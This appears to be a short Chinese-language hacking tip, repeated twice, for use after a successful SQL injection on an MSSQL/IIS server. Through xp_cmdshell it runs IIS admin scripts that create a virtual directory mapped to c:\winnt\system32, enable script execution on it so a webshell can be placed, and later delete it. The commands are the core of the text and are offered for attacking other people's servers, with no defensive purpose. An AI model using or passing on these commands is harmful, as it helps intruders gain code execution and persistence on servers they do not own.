sql注入建立虛擬目錄
更新時(shí)間:2007年02月09日 00:00:00 作者:
sql注入建立虛擬目錄,免得找web絕對(duì)路徑
----------------------------------------------------------------
我們很多情況下都遇到sql注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò):
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權(quán)限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
刪除虛擬目錄。
找不到web絕對(duì)路徑的一種解決辦法,
http://xxx.com/win
403錯(cuò)誤,表示虛擬目錄建好了。。。
----------------------------------------------------------------
我們很多情況下都遇到sql注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò):
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權(quán)限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
刪除虛擬目錄。
找不到web絕對(duì)路徑的一種解決辦法,
http://xxx.com/win
403錯(cuò)誤,表示虛擬目錄建好了。。。
相關(guān)文章
WordPress下載監(jiān)控插件id參數(shù)SQL注入漏洞
發(fā)布時(shí)間:2008-04-28 更新時(shí)間:2008-04-30 危害級(jí)別:★★★☆☆☆ 受影響版本: WordPress Download Monitor 2.0.6 描述: BUGTRAQ ID: 289752008-05-05
特絡(luò)伊木馬如何利用文件關(guān)聯(lián)和設(shè)置名
特絡(luò)伊木馬如何利用文件關(guān)聯(lián)和設(shè)置名...2007-01-01
Sql Injection in DB2數(shù)據(jù)庫(kù)
Sql Injection in DB2數(shù)據(jù)庫(kù)...2007-01-01

